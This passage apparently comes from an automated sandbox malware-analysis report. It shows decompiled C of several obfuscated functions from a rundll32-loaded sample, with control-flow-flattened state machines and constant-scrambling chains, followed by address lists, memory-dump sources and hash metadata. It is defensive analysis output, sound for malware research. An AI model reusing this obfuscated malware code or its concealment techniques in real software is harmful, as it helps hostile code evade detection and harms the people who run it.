				signed int _t322;
				intOrPtr _t332;
				intOrPtr _t334;
				intOrPtr _t354;
				void* _t361;
				signed int* _t365;

				_t365 =  &_v1168;
				_v1048 = _v1048 & 0x00000000;
				_v1044 = _v1044 & 0x00000000;
				_v1052 = 0xd27b82;
				_v1132 = 0xd68ad;
				_t317 = 0x39;
				_t361 = 0x31951cf;
				_v1132 = _v1132 / _t317;
				_v1132 = _v1132 | 0x7a114e95;
				_v1132 = _v1132 >> 9;
				_v1132 = _v1132 ^ 0x003f4f84;
				_v1164 = 0x8948b3;
				_v1164 = _v1164 + 0x5689;
				_v1164 = _v1164 + 0xffffbb3a;
				_t318 = 0x19;
				_v1164 = _v1164 * 0x56;
				_v1164 = _v1164 ^ 0x2e2b97d6;
				_v1072 = 0xcb9c2b;
				_v1072 = _v1072 >> 3;
				_v1072 = _v1072 ^ 0x001ca36a;
				_v1080 = 0x1dbdae;
				_v1080 = _v1080 >> 8;
				_v1080 = _v1080 ^ 0x00014686;
				_v1156 = 0xb5510a;
				_v1156 = _v1156 / _t318;
				_v1156 = _v1156 ^ 0xc10914df;
				_v1156 = _v1156 | 0x9ca0ebe9;
				_v1156 = _v1156 ^ 0xdda118ad;
				_v1104 = 0x66b826;
				_v1104 = _v1104 ^ 0xe9987981;
				_v1104 = _v1104 * 0x25;
				_v1104 = _v1104 ^ 0xd1d8b52b;
				_v1056 = 0xa9a3d5;
				_v1056 = _v1056 * 0x6e;
				_v1056 = _v1056 ^ 0x48e0209e;
				_v1064 = 0xff8e1d;
				_v1064 = _v1064 + 0x7d6c;
				_v1064 = _v1064 ^ 0x0102ce02;
				_v1060 = 0x1cd25;
				_v1060 = _v1060 >> 0xe;
				_v1060 = _v1060 ^ 0x00092955;
				_v1112 = 0x2e454b;
				_v1112 = _v1112 ^ 0xdfc484a9;
				_v1112 = _v1112 << 4;
				_v1112 = _v1112 ^ 0xfea80718;
				_v1084 = 0x44c343;
				_v1084 = _v1084 * 0x5e;
				_v1084 = _v1084 ^ 0x99776358;
				_v1084 = _v1084 ^ 0x804f0a92;
				_v1148 = 0xd43471;
				_v1148 = _v1148 << 0x10;
				_v1148 = _v1148 ^ 0xf30ce1ba;
				_v1148 = _v1148 | 0x5684f5e4;
				_v1148 = _v1148 ^ 0xd7f82c28;
				_v1140 = 0xc6d087;
				_v1140 = _v1140 * 0xf;
				_v1140 = _v1140 / _t318;
				_t319 = 0x11;
				_v1140 = _v1140 / _t319;
				_v1140 = _v1140 ^ 0x000f807a;
				_v1076 = 0xeb33ff;
				_v1076 = _v1076 | 0x3caa7413;
				_v1076 = _v1076 ^ 0x3ce1a50e;
				_v1160 = 0xf6df2e;
				_v1160 = _v1160 << 3;
				_t320 = 0x12;
				_v1160 = _v1160 / _t320;
				_t321 = 0x23;
				_v1160 = _v1160 / _t321;
				_v1160 = _v1160 ^ 0x0001c97f;
				_v1096 = 0x2990f1;
				_v1096 = _v1096 + 0x8b3d;
				_v1096 = _v1096 << 4;
				_v1096 = _v1096 ^ 0x02a87cfa;
				_v1168 = 0x9204f1;
				_v1168 = _v1168 << 2;
				_v1168 = _v1168 >> 0xe;
				_v1168 = _v1168 ^ 0x6a27e144;
				_v1168 = _v1168 ^ 0x6a24f645;
				_v1068 = 0x63146e;
				_v1068 = _v1068 + 0xffffb906;
				_v1068 = _v1068 ^ 0x00673218;
				_v1124 = 0xa7a9d5;
				_v1124 = _v1124 * 0x43;
				_v1124 = _v1124 + 0xa631;
				_v1124 = _v1124 ^ 0x2beabd88;
				_v1144 = 0x5bd0aa;
				_v1144 = _v1144 * 6;
				_v1144 = _v1144 | 0x1ea27ebc;
				_v1144 = _v1144 + 0xffff7d79;
				_v1144 = _v1144 ^ 0x1eab8d23;
				_v1152 = 0x75499f;
				_v1152 = _v1152 >> 7;
				_v1152 = _v1152 * 0x3b;
				_v1152 = _v1152 * 0x36;
				_v1152 = _v1152 ^ 0x0b6e0547;
				_v1116 = 0xfc11ad;
				_v1116 = _v1116 ^ 0xa8b58fc5;
				_v1116 = _v1116 * 0x46;
				_v1116 = _v1116 ^ 0x042cd8c8;
				_v1088 = 0x98b2ad;
				_v1088 = _v1088 + 0x5f8d;
				_v1088 = _v1088 << 8;
				_v1088 = _v1088 ^ 0x99161df3;
				_v1108 = 0xc44bb5;
				_v1108 = _v1108 + 0xffff808c;
				_v1108 = _v1108 ^ 0x7a0d028c;
				_v1108 = _v1108 ^ 0x7ac2537a;
				_v1128 = 0x834e58;
				_v1128 = _v1128 + 0xffff18d5;
				_v1128 = _v1128 << 0xe;
				_v1128 = _v1128 + 0xe46a;
				_v1128 = _v1128 ^ 0x99c7b134;
				_v1136 = 0xd0608e;
				_v1136 = _v1136 << 0xd;
				_v1136 = _v1136 ^ 0x0f37e4e4;
				_v1136 = _v1136 ^ 0x0bc0752d;
				_v1136 = _v1136 ^ 0x08ebd133;
				_v1120 = 0xe37477;
				_v1120 = _v1120 << 0xf;
				_v1120 = _v1120 << 0x10;
				_v1120 = _v1120 ^ 0x800d4304;
				_v1092 = 0xa7d287;
				_v1092 = _v1092 * 0x3e;
				_v1092 = _v1092 << 0xb;
				_v1092 = _v1092 ^ 0x27ebbc9f;
				_v1100 = 0xbdc4ed;
				_v1100 = _v1100 << 8;
				_t322 = 0x37;
				_v1100 = _v1100 / _t322;
				_v1100 = _v1100 ^ 0x03761b38;
				_t307 = E0036074A();
				do {
					while(_t361 != 0x31951cf) {
						if(_t361 == 0x3cad130) {
							_push( &_v1040);
							_push( &_v520);
							_push(_v1100);
							return E00348D95(_v1120, _v1092, __eflags);
						}
						if(_t361 == 0xac73e1e) {
							_push(_v1068);
							_push(_v1168);
							_push(0x34113c);
							_t311 = E0034AB66(_v1160, _v1096, __eflags);
							_t312 = E00345AE2(_v1124);
							_t354 =  *0x36520c; // 0x0
							_t266 = _t354 + 0x220; // 0x220
							_t268 = _t354 + 8; // 0x8
							E0035D37B(_t311, __eflags, _v1152, _t312, _t268, _v1116, _t268,  &_v520, _t266, _v1088);
							_t307 = E0034AE03(_v1108, _v1128, _v1136, _t311);
							_t365 =  &(_t365[0xd]);
							_t361 = 0x3cad130;
							continue;
						}
						_t373 = _t361 - 0xc947a3e;
						if(_t361 != 0xc947a3e) {
							goto L8;
						}
						_push(_v1104);
						_push(_v1156);
						_push(0x3410cc);
						_t314 = E0034AB66(_v1072, _v1080, _t373);
						_t332 =  *0x36520c; // 0x0
						_t334 =  *0x36520c; // 0x0
						E0034E7CE(_t314, _t373, _v1056, _t334 + 8, _t332 + 0x220, _v1064, _v1060, _v1112, _v1084, _t332 + 0x220);
						_t307 = E0034AE03(_v1148, _v1140, _v1076, _t314);
						_t365 =  &(_t365[0xd]);
						_t361 = 0xac73e1e;
					}
					_t361 = 0xc947a3e;
					L8:
					__eflags = _t361 - 0x9b97ca4;
				} while (__eflags != 0);
				return _t307;
			}




















































                                                                                                                      0x00342830
                                                                                                                      0x00342836
                                                                                                                      0x0034283d
                                                                                                                      0x00342842
                                                                                                                      0x0034284a
                                                                                                                      0x0034285c
                                                                                                                      0x00342861
                                                                                                                      0x00342866
                                                                                                                      0x0034286a
                                                                                                                      0x00342872
                                                                                                                      0x00342877
                                                                                                                      0x0034287f
                                                                                                                      0x00342887
                                                                                                                      0x0034288f
                                                                                                                      0x0034289e
                                                                                                                      0x003428a1
                                                                                                                      0x003428a5
                                                                                                                      0x003428ad
                                                                                                                      0x003428b5
                                                                                                                      0x003428ba
                                                                                                                      0x003428c2
                                                                                                                      0x003428ca
                                                                                                                      0x003428cf
                                                                                                                      0x003428d7
                                                                                                                      0x003428e7
                                                                                                                      0x003428eb
                                                                                                                      0x003428f3
                                                                                                                      0x003428fb
                                                                                                                      0x00342903
                                                                                                                      0x0034290b
                                                                                                                      0x00342918
                                                                                                                      0x0034291c
                                                                                                                      0x00342924
                                                                                                                      0x00342937
                                                                                                                      0x0034293e
                                                                                                                      0x00342949
                                                                                                                      0x00342951
                                                                                                                      0x00342959
                                                                                                                      0x00342961
                                                                                                                      0x0034296c
                                                                                                                      0x00342974
                                                                                                                      0x0034297f
                                                                                                                      0x00342987
                                                                                                                      0x0034298f
                                                                                                                      0x00342994
                                                                                                                      0x0034299c
                                                                                                                      0x003429a9
                                                                                                                      0x003429ad
                                                                                                                      0x003429b5
                                                                                                                      0x003429bd
                                                                                                                      0x003429c5
                                                                                                                      0x003429ca
                                                                                                                      0x003429d2
                                                                                                                      0x003429da
                                                                                                                      0x003429e2
                                                                                                                      0x003429ef
                                                                                                                      0x003429fb
                                                                                                                      0x00342a03
                                                                                                                      0x00342a06
                                                                                                                      0x00342a0c
                                                                                                                      0x00342a14
                                                                                                                      0x00342a1c
                                                                                                                      0x00342a24
                                                                                                                      0x00342a2c
                                                                                                                      0x00342a34
                                                                                                                      0x00342a3f
                                                                                                                      0x00342a44
                                                                                                                      0x00342a4e
                                                                                                                      0x00342a51
                                                                                                                      0x00342a55
                                                                                                                      0x00342a5d
                                                                                                                      0x00342a65
                                                                                                                      0x00342a6d
                                                                                                                      0x00342a72
                                                                                                                      0x00342a7a
                                                                                                                      0x00342a82
                                                                                                                      0x00342a87
                                                                                                                      0x00342a8c
                                                                                                                      0x00342a94
                                                                                                                      0x00342a9c
                                                                                                                      0x00342aa4
                                                                                                                      0x00342aac
                                                                                                                      0x00342ab4
                                                                                                                      0x00342ac1
                                                                                                                      0x00342ac5
                                                                                                                      0x00342acd
                                                                                                                      0x00342ad5
                                                                                                                      0x00342ae2
                                                                                                                      0x00342ae6
                                                                                                                      0x00342aee
                                                                                                                      0x00342af6
                                                                                                                      0x00342afe
                                                                                                                      0x00342b06
                                                                                                                      0x00342b10
                                                                                                                      0x00342b19
                                                                                                                      0x00342b1d
                                                                                                                      0x00342b25
                                                                                                                      0x00342b2d
                                                                                                                      0x00342b3a
                                                                                                                      0x00342b3e
                                                                                                                      0x00342b46
                                                                                                                      0x00342b4e
                                                                                                                      0x00342b56
                                                                                                                      0x00342b5b
                                                                                                                      0x00342b63
                                                                                                                      0x00342b6b
                                                                                                                      0x00342b73
                                                                                                                      0x00342b7b
                                                                                                                      0x00342b83
                                                                                                                      0x00342b8b
                                                                                                                      0x00342b93
                                                                                                                      0x00342b98
                                                                                                                      0x00342ba0
                                                                                                                      0x00342ba8
                                                                                                                      0x00342bb0
                                                                                                                      0x00342bb5
                                                                                                                      0x00342bbd
                                                                                                                      0x00342bc5
                                                                                                                      0x00342bcd
                                                                                                                      0x00342bd5
                                                                                                                      0x00342bda
                                                                                                                      0x00342bdf
                                                                                                                      0x00342be7
                                                                                                                      0x00342bf4
                                                                                                                      0x00342bf8
                                                                                                                      0x00342bfd
                                                                                                                      0x00342c07
                                                                                                                      0x00342c0f
                                                                                                                      0x00342c1a
                                                                                                                      0x00342c1d
                                                                                                                      0x00342c21
                                                                                                                      0x00342c31
                                                                                                                      0x00342c45
                                                                                                                      0x00342c45
                                                                                                                      0x00342c53
                                                                                                                      0x00342d77
                                                                                                                      0x00342d7f
                                                                                                                      0x00342d80
                                                                                                                      0x00000000
                                                                                                                      0x00342d91
                                                                                                                      0x00342c5b
                                                                                                                      0x00342cea
                                                                                                                      0x00342cee
                                                                                                                      0x00342cfa
                                                                                                                      0x00342cff
                                                                                                                      0x00342d0d
                                                                                                                      0x00342d16
                                                                                                                      0x00342d1c
                                                                                                                      0x00342d2b
                                                                                                                      0x00342d3f
                                                                                                                      0x00342d51
                                                                                                                      0x00342d56
                                                                                                                      0x00342d59
                                                                                                                      0x00000000
                                                                                                                      0x00342d59
                                                                                                                      0x00342c61
                                                                                                                      0x00342c63
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x00342c69
                                                                                                                      0x00342c6d
                                                                                                                      0x00342c79
                                                                                                                      0x00342c7e
                                                                                                                      0x00342c83
                                                                                                                      0x00342cae
                                                                                                                      0x00342cc6
                                                                                                                      0x00342cdb
                                                                                                                      0x00342ce0
                                                                                                                      0x00342ce3
                                                                                                                      0x00342ce3
                                                                                                                      0x00342d60
                                                                                                                      0x00342d62
                                                                                                                      0x00342d62
                                                                                                                      0x00342d62
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: D'j$KE.$U)$j$l}$wt
                                                                                                                      • API String ID: 0-3929749274
                                                                                                                      • Opcode ID: 4beb3a234f8651444a99a5f8c89bebd00b3e109bbb9e41b8467314dcc3b9540c
                                                                                                                      • Instruction ID: 6cfccaab21c2a3fd0c2148b2ac8b61e7c3252bdc9e280afb0ebaf6a95c74a240
                                                                                                                      • Opcode Fuzzy Hash: 4beb3a234f8651444a99a5f8c89bebd00b3e109bbb9e41b8467314dcc3b9540c
                                                                                                                      • Instruction Fuzzy Hash: 3AD12F724083809FC369CF65C58A90BFBE1FBC5748F508A1DF1A69A260D7B59948CF42
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035129C Relevance: 7.8, Strings: 6, Instructions: 266COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 94%
                                                                                                                      			E0035129C(signed int* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8) {
				void* _v16;
				intOrPtr _v20;
				char _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				unsigned int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				void* _t225;
				signed int _t257;
				signed int* _t258;
				void* _t260;
				signed int _t295;
				signed int _t296;
				signed int _t297;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int* _t305;
				void* _t308;

				_t302 = _a8;
				_t258 = __ecx;
				_push(_a8);
				_push(_a4);
				_push(__ecx);
				E0034CF25(_t225);
				_v20 = 0x578391;
				_t305 =  &(( &_v164)[4]);
				asm("stosd");
				_t260 = 0x3e847b6;
				asm("stosd");
				asm("stosd");
				_v136 = 0x7901e7;
				_v136 = _v136 ^ 0x0e05b978;
				_v136 = _v136 | 0x8500df2f;
				_v136 = _v136 ^ 0x8f7cffbf;
				_v72 = 0x5c6105;
				_v72 = _v72 ^ 0xba418fb0;
				_v72 = _v72 ^ 0xba16afcf;
				_v156 = 0xc57f64;
				_v156 = _v156 << 0xe;
				_v156 = _v156 | 0xac310e4c;
				_t295 = 0x48;
				_v156 = _v156 / _t295;
				_v156 = _v156 ^ 0x038a2108;
				_v100 = 0xf9dfe5;
				_v100 = _v100 >> 0xc;
				_v100 = _v100 ^ 0x0009d912;
				_v112 = 0xb5688b;
				_t296 = 0x3d;
				_v112 = _v112 / _t296;
				_v112 = _v112 ^ 0x00064c77;
				_v116 = 0x80f1cc;
				_v116 = _v116 + 0xfffff23f;
				_v116 = _v116 ^ 0x008ab174;
				_v92 = 0xc78857;
				_v92 = _v92 | 0x5f9c477c;
				_v92 = _v92 ^ 0x5fdf5dba;
				_v148 = 0x3d8773;
				_v148 = _v148 >> 0xa;
				_v148 = _v148 | 0x15c33ced;
				_v148 = _v148 + 0xffff6977;
				_v148 = _v148 ^ 0x15c9e03a;
				_v140 = 0x8050fd;
				_v140 = _v140 + 0xffffb165;
				_v140 = _v140 ^ 0xb13fe806;
				_v140 = _v140 ^ 0xb1b5a353;
				_v104 = 0x3fa35;
				_v104 = _v104 ^ 0x0635ab8b;
				_v104 = _v104 ^ 0x0638ddfb;
				_v128 = 0x6276d2;
				_v128 = _v128 * 0x67;
				_v128 = _v128 >> 7;
				_v128 = _v128 ^ 0x004624e6;
				_v84 = 0xb2127e;
				_v84 = _v84 ^ 0xdd4df2db;
				_v84 = _v84 ^ 0xddf0f9d7;
				_v108 = 0x825106;
				_v108 = _v108 + 0x54ee;
				_v108 = _v108 ^ 0x00831379;
				_v96 = 0x675ffa;
				_v96 = _v96 + 0xffff86b7;
				_v96 = _v96 ^ 0x0064c66c;
				_v132 = 0x78c111;
				_v132 = _v132 >> 0xb;
				_v132 = _v132 + 0xffff7c58;
				_v132 = _v132 ^ 0xfff3b3ba;
				_v164 = 0xbe0848;
				_t297 = 0x46;
				_v164 = _v164 / _t297;
				_v164 = _v164 << 4;
				_v164 = _v164 >> 5;
				_v164 = _v164 ^ 0x00009249;
				_v152 = 0xd46630;
				_v152 = _v152 | 0x25786146;
				_v152 = _v152 << 6;
				_t298 = 0x4f;
				_v152 = _v152 / _t298;
				_v152 = _v152 ^ 0x0191f926;
				_v144 = 0xf6674c;
				_v144 = _v144 >> 6;
				_v144 = _v144 ^ 0xb535724d;
				_v144 = _v144 ^ 0xb53e6a0f;
				_v160 = 0x2a1e3b;
				_v160 = _v160 >> 5;
				_t299 = 0x76;
				_v160 = _v160 / _t299;
				_v160 = _v160 << 7;
				_v160 = _v160 ^ 0x00046312;
				_v120 = 0xf44552;
				_v120 = _v120 + 0xbd95;
				_v120 = _v120 ^ 0x00f02cb9;
				_v76 = 0x9a2b11;
				_v76 = _v76 << 6;
				_v76 = _v76 ^ 0x2684a730;
				_v80 = 0x6aeef9;
				_t300 = 0x51;
				_v80 = _v80 / _t300;
				_v80 = _v80 ^ 0x000c464e;
				_v124 = 0x84a5f5;
				_v124 = _v124 << 5;
				_v124 = _v124 + 0xddfe;
				_v124 = _v124 ^ 0x10975fd7;
				_v88 = 0xa441a9;
				_v88 = _v88 + 0x5567;
				_v88 = _v88 ^ 0x00aef9b7;
				goto L1;
				do {
					while(1) {
						L1:
						_t308 = _t260 - 0x8801db7;
						if(_t308 > 0) {
							break;
						}
						if(_t308 == 0) {
							E0035F88F(_t302 + 0x1c,  &_v68, __eflags, _v80, _v124, _v88);
						} else {
							if(_t260 == 0x235eed) {
								E00354D91( *((intOrPtr*)(_t302 + 0x18)),  &_v68, _v164, _v152);
								_t305 =  &(_t305[2]);
								_t260 = 0x85d9450;
								continue;
							} else {
								if(_t260 == 0x3e847b6) {
									_t260 = 0xab5e479;
									 *_t258 =  *_t258 & 0x00000000;
									_t258[1] = _v136;
									continue;
								} else {
									if(_t260 == 0x6ea21eb) {
										E00354D91( *((intOrPtr*)(_t302 + 0x24)),  &_v68, _v84, _v108);
										_t305 =  &(_t305[2]);
										_t260 = 0x9265c01;
										continue;
									} else {
										if(_t260 == 0x80db57c) {
											E00354D91( *((intOrPtr*)(_t302 + 0x30)),  &_v68, _v120, _v76);
											_t305 =  &(_t305[2]);
											_t260 = 0x8801db7;
											continue;
										} else {
											if(_t260 != 0x85d9450) {
												goto L24;
											} else {
												E00354D91( *((intOrPtr*)(_t302 + 0x38)),  &_v68, _v144, _v160);
												_t305 =  &(_t305[2]);
												_t260 = 0x80db57c;
												continue;
											}
										}
									}
								}
							}
						}
						L27:
						__eflags =  *_t258;
						_t224 =  *_t258 != 0;
						__eflags = _t224;
						return 0 | _t224;
					}
					__eflags = _t260 - 0x9265c01;
					if(_t260 == 0x9265c01) {
						E00354D91( *((intOrPtr*)(_t302 + 0x34)),  &_v68, _v96, _v132);
						_t305 =  &(_t305[2]);
						_t260 = 0x235eed;
						goto L24;
					} else {
						__eflags = _t260 - 0xa20e3fb;
						if(__eflags == 0) {
							E0035F88F(_t302 + 8,  &_v68, __eflags, _v140, _v104, _v128);
							_t305 =  &(_t305[3]);
							_t260 = 0x6ea21eb;
							goto L1;
						} else {
							__eflags = _t260 - 0xab5e479;
							if(_t260 == 0xab5e479) {
								_t258[1] = E0036146E(_t302);
								_t260 = 0xffaf556;
								goto L1;
							} else {
								__eflags = _t260 - 0xf4853c6;
								if(_t260 == 0xf4853c6) {
									E003564C5(_v112, _v116, _v92, _v148, _t258,  &_v68);
									_t305 =  &(_t305[4]);
									_t260 = 0xa20e3fb;
									goto L1;
								} else {
									__eflags = _t260 - 0xffaf556;
									if(_t260 != 0xffaf556) {
										goto L24;
									} else {
										_push(_t260);
										_push(_t260);
										_t257 = E00353512(_t258[1]);
										 *_t258 = _t257;
										__eflags = _t257;
										if(__eflags != 0) {
											_t260 = 0xf4853c6;
											goto L1;
										}
									}
								}
							}
						}
					}
					goto L27;
					L24:
					__eflags = _t260 - 0x1d5478a;
				} while (__eflags != 0);
				goto L27;
			}










































                                                                                                                      0x003512a5
                                                                                                                      0x003512ac
                                                                                                                      0x003512af
                                                                                                                      0x003512b0
                                                                                                                      0x003512b8
                                                                                                                      0x003512b9
                                                                                                                      0x003512be
                                                                                                                      0x003512d2
                                                                                                                      0x003512d5
                                                                                                                      0x003512d8
                                                                                                                      0x003512df
                                                                                                                      0x003512e0
                                                                                                                      0x003512e1
                                                                                                                      0x003512e9
                                                                                                                      0x003512f1
                                                                                                                      0x003512f9
                                                                                                                      0x00351301
                                                                                                                      0x00351309
                                                                                                                      0x00351311
                                                                                                                      0x00351319
                                                                                                                      0x00351321
                                                                                                                      0x00351326
                                                                                                                      0x00351332
                                                                                                                      0x00351337
                                                                                                                      0x0035133d
                                                                                                                      0x00351345
                                                                                                                      0x0035134d
                                                                                                                      0x00351352
                                                                                                                      0x0035135a
                                                                                                                      0x00351366
                                                                                                                      0x00351369
                                                                                                                      0x0035136d
                                                                                                                      0x00351375
                                                                                                                      0x0035137d
                                                                                                                      0x00351385
                                                                                                                      0x0035138d
                                                                                                                      0x00351395
                                                                                                                      0x0035139d
                                                                                                                      0x003513a5
                                                                                                                      0x003513ad
                                                                                                                      0x003513b2
                                                                                                                      0x003513ba
                                                                                                                      0x003513c2
                                                                                                                      0x003513ca
                                                                                                                      0x003513d2
                                                                                                                      0x003513da
                                                                                                                      0x003513e2
                                                                                                                      0x003513ea
                                                                                                                      0x003513f2
                                                                                                                      0x003513fa
                                                                                                                      0x00351402
                                                                                                                      0x0035140f
                                                                                                                      0x00351413
                                                                                                                      0x00351418
                                                                                                                      0x00351420
                                                                                                                      0x00351428
                                                                                                                      0x00351430
                                                                                                                      0x00351438
                                                                                                                      0x00351440
                                                                                                                      0x00351448
                                                                                                                      0x00351450
                                                                                                                      0x00351458
                                                                                                                      0x00351460
                                                                                                                      0x00351468
                                                                                                                      0x00351470
                                                                                                                      0x00351475
                                                                                                                      0x0035147f
                                                                                                                      0x0035148c
                                                                                                                      0x0035149a
                                                                                                                      0x0035149f
                                                                                                                      0x003514a5
                                                                                                                      0x003514aa
                                                                                                                      0x003514af
                                                                                                                      0x003514b7
                                                                                                                      0x003514bf
                                                                                                                      0x003514c7
                                                                                                                      0x003514d0
                                                                                                                      0x003514d5
                                                                                                                      0x003514db
                                                                                                                      0x003514e3
                                                                                                                      0x003514eb
                                                                                                                      0x003514f0
                                                                                                                      0x003514f8
                                                                                                                      0x00351500
                                                                                                                      0x00351508
                                                                                                                      0x00351511
                                                                                                                      0x00351516
                                                                                                                      0x0035151c
                                                                                                                      0x00351521
                                                                                                                      0x00351529
                                                                                                                      0x00351531
                                                                                                                      0x00351539
                                                                                                                      0x00351541
                                                                                                                      0x00351549
                                                                                                                      0x0035154e
                                                                                                                      0x00351556
                                                                                                                      0x00351562
                                                                                                                      0x0035156a
                                                                                                                      0x0035156e
                                                                                                                      0x00351576
                                                                                                                      0x0035157e
                                                                                                                      0x00351583
                                                                                                                      0x0035158b
                                                                                                                      0x00351593
                                                                                                                      0x0035159b
                                                                                                                      0x003515a3
                                                                                                                      0x003515a3
                                                                                                                      0x003515ab
                                                                                                                      0x003515ab
                                                                                                                      0x003515ab
                                                                                                                      0x003515ab
                                                                                                                      0x003515ad
                                                                                                                      0x00000000
                                                                                                                      0x00000000
                                                                                                                      0x003515b3
                                                                                                                      0x0035176b
                                                                                                                      0x003515b9
                                                                                                                      0x003515bf
                                                                                                                      0x00351666
                                                                                                                      0x0035166b
                                                                                                                      0x0035166e
                                                                                                                      0x00000000
                                                                                                                      0x003515c5
                                                                                                                      0x003515cb
                                                                                                                      0x00351647
                                                                                                                      0x0035164c
                                                                                                                      0x0035164f
                                                                                                                      0x00000000
                                                                                                                      0x003515cd
                                                                                                                      0x003515d3
                                                                                                                      0x00351631
                                                                                                                      0x00351636
                                                                                                                      0x00351639
                                                                                                                      0x00000000
                                                                                                                      0x003515d5
                                                                                                                      0x003515db
                                                                                                                      0x00351616
                                                                                                                      0x0035161b
                                                                                                                      0x0035161e
                                                                                                                      0x00000000
                                                                                                                      0x003515dd
                                                                                                                      0x003515e3
                                                                                                                      0x00000000
                                                                                                                      0x003515e9
                                                                                                                      0x003515f8
                                                                                                                      0x003515fd
                                                                                                                      0x00351600
                                                                                                                      0x00000000
                                                                                                                      0x00351600
                                                                                                                      0x003515e3
                                                                                                                      0x003515db
                                                                                                                      0x003515d3
                                                                                                                      0x003515cb
                                                                                                                      0x003515bf
                                                                                                                      0x00351774
                                                                                                                      0x00351776
                                                                                                                      0x0035177a
                                                                                                                      0x0035177a
                                                                                                                      0x00351784
                                                                                                                      0x00351784
                                                                                                                      0x00351678
                                                                                                                      0x0035167e
                                                                                                                      0x0035173d
                                                                                                                      0x00351742
                                                                                                                      0x00351745
                                                                                                                      0x00000000
                                                                                                                      0x00351684
                                                                                                                      0x00351684
                                                                                                                      0x0035168a
                                                                                                                      0x0035171c
                                                                                                                      0x00351721
                                                                                                                      0x00351724
                                                                                                                      0x00000000
                                                                                                                      0x0035168c
                                                                                                                      0x0035168c
                                                                                                                      0x00351692
                                                                                                                      0x003516fc
                                                                                                                      0x003516ff
                                                                                                                      0x00000000
                                                                                                                      0x00351694
                                                                                                                      0x00351694
                                                                                                                      0x00351696
                                                                                                                      0x003516e3
                                                                                                                      0x003516e8
                                                                                                                      0x003516eb
                                                                                                                      0x00000000
                                                                                                                      0x00351698
                                                                                                                      0x00351698
                                                                                                                      0x0035169e
                                                                                                                      0x00000000
                                                                                                                      0x003516a4
                                                                                                                      0x003516b0
                                                                                                                      0x003516b1
                                                                                                                      0x003516b5
                                                                                                                      0x003516ba
                                                                                                                      0x003516be
                                                                                                                      0x003516c0
                                                                                                                      0x003516c6
                                                                                                                      0x00000000
                                                                                                                      0x003516c6
                                                                                                                      0x003516c0
                                                                                                                      0x0035169e
                                                                                                                      0x00351696
                                                                                                                      0x00351692
                                                                                                                      0x0035168a
                                                                                                                      0x00000000
                                                                                                                      0x0035174a
                                                                                                                      0x0035174a
                                                                                                                      0x0035174a
                                                                                                                      0x00000000

                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000009.00000002.450510384.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true
                                                                                                                      • Associated: 00000009.00000002.450496928.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      • Associated: 00000009.00000002.450529337.0000000000365000.00000004.00000800.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_9_2_340000_rundll32.jbxd
                                                                                                                      Yara matches
                                                                                                                      Similarity
                                                                                                                      • API ID:
                                                                                                                      • String ID: Fax%$gU$$F$T$^#$^#
                                                                                                                      • API String ID: 0-2311862416
                                                                                                                      • Opcode ID: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction ID: 6fbedce9db30818865b9a1abf5b0ef798e5f4f826f962f2e3669872cd32ae1a1
                                                                                                                      • Opcode Fuzzy Hash: ec0ed06aba5dba57669efc6d06ae299f3cdbf4a225dd5178920b32f9c929715b
                                                                                                                      • Instruction Fuzzy Hash: ECC142715087809FC759CF64C88991FBBF2FBC5719F144A1DFA864A260D3B58949CF82
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      Function 0035363D Relevance: 7.8, Strings: 6, Instructions: 259COMMONCrypto
                                                                                                                      Download Yara Rule
                                                                                                                      C-Code - Quality: 74%
                                                                                                                      			E0035363D(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a28) {
				intOrPtr _v60;
				char _v68;
				char _v72;
				signed int _v76;
				signed int _v80;
				signed int _v84;
				signed int _v88;
				signed int _v92;
				signed int _v96;
				signed int _v100;
				signed int _v104;
				signed int _v108;
				signed int _v112;
				signed int _v116;
				signed int _v120;
				signed int _v124;
				signed int _v128;
				signed int _v132;
				signed int _v136;
				signed int _v140;
				signed int _v144;
				signed int _v148;
				signed int _v152;
				signed int _v156;
				signed int _v160;
				signed int _v164;
				signed int _v168;
				signed int _v172;
				signed int _v176;
				char _t264;
				signed int _t295;
				signed int _t298;
				signed int _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				signed int _t303;
				signed int _t304;
				void* _t307;
				void* _t308;
				void* _t334;
				intOrPtr _t335;
				signed int* _t338;

				_push(_a28);
				_t334 = __ecx;
				_push(0);
				_push(_a20);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(0);
				_push(__ecx);
				_t264 = E0034CF25(0);
				_v72 = _t264;
				_t335 = _t264;
				_v124 = 0xc44be;
				_t338 =  &(( &_v176)[9]);
